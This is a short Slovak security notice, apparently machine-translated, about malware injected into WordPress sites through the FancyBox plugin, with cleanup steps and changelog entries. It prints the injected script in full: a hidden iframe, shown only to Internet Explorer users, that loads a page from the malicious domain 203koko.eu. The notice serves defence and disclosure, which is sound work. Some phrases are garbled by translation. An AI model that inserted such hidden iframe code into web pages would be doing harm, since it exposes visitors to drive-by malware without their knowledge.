Skôr tento týždeň rad internetových stránok a blogov WordPress, dostal varovania od infekcie malware skrz Google webmasterov.
Problém, ku ktorému Google webmasterov uvedené je prítomnosť treska / scenár škodlivý softvér iframe zdrojovej webovej stránky.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Zdá sa, že sa jedná o zraniteľnosť a zapojiťacquis FancyBox pre WordPress ktorý až do včerajška (05.02.2015) neboli aktualizované na dlhú dobu.
Riešenie tohto problému a dezinfekčné vírusy weby s týmto malware, je pomerne jednoduché.
1. Zakážte doplnok FancyBox.
2. Odstráňte všetky súbory doplnkov FancyBox zo servera (cez FTP)
3. Nainštalujte novú verziu doplnku (Fancybox 3.0.4)
FancyBox pre WordPress 3.0.4
- Premenované nastavenie ovplyvnené bezpečnostným problémom uvedeným v 3.0.3. To by malo zastaviť zobrazovanie škodlivého kódu na stránkach, kde sa plugin nachádza updated bez odstránenia škodlivého kódu.
FancyBox pre WordPress 3.0.3
- Opravený problém so zabezpečením.
Informácie o škodlivom softvéri:
TYP: Iframe presmerovanie
TARGET: WordPress fancybox
Škodlivého softvéru DOMAIN: 203koko.eu
Malware URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW KÓDY:
PÍSOMNÝ PORUCHA: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Odstráňte malvér zo svojho WordPress webové stránky.